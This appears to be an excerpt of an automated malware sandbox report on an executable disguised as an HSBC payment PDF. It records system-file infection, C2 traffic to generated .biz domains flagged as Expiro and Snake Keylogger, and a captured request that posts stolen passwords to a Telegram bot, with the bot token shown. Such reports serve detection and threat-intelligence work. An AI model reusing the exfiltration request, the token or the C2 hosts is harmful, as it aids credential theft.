Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0046445A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046C6D1 FindFirstFileW,FindClose,	1_2_0046C6D1
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0046C75C
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0046EF95
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0046F0F2
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0046F3F3
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_004637EF
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00463B12
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0046BCBC

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:49242 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49726 -> 172.234.222.138:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49866 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:63846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49747 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1b5b29d136dfHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 72.52.179.174 72.52.179.174

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49705
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49705
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49754
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49754
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49720
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49720
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49961
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49961
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49977
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49714 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49977

Source: global traffic	HTTP traffic detected: POST /agwftt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /vejjgkofjksncu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 898
Source: global traffic	HTTP traffic detected: POST /lfrkuluoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ljydopjkwkbil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 898
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ubwy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /edmrjb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /gtsohqagtapqeyt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /gtsohqagtapqeyt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /gtsohqagtapqeyt?usid=23&utid=8062768005 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /aikqer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /aikqer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /aikqer?usid=23&utid=8062768193 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /nfm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /reorqerswtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /lvpmgtiw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /glgnfdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /wjff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cuqeksdmcesun HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /sdnqcxpiurneql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49721 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_004722EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /gtsohqagtapqeyt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /gtsohqagtapqeyt?usid=23&utid=8062768005 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /aikqer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /aikqer?usid=23&utid=8062768193 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww99.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ww7.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz

Source: unknown

HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1b5b29d136dfHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107//
Source: armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/b
Source: armsvc.exe, 00000003.00000003.1391756054.0000000000766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/lfrkuluoy
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/ljydopjkwkbil
Source: armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/nfm
Source: armsvc.exe, 00000003.00000003.1773374374.0000000000766000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.000000000076C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536726794.0000000000766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/nfmiz
Source: armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/xUw
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/ljydopjkwkbil
Source: armsvc.exe, 00000003.00000003.1363534735.000000000076D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1391756054.000000000076D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: armsvc.exe, 00000003.00000003.1363534735.0000000000764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/agwftt
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362494796.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vejjgkofjksncu
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vejjgkofjksncuSZ99
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/vejjgkofjksncu6
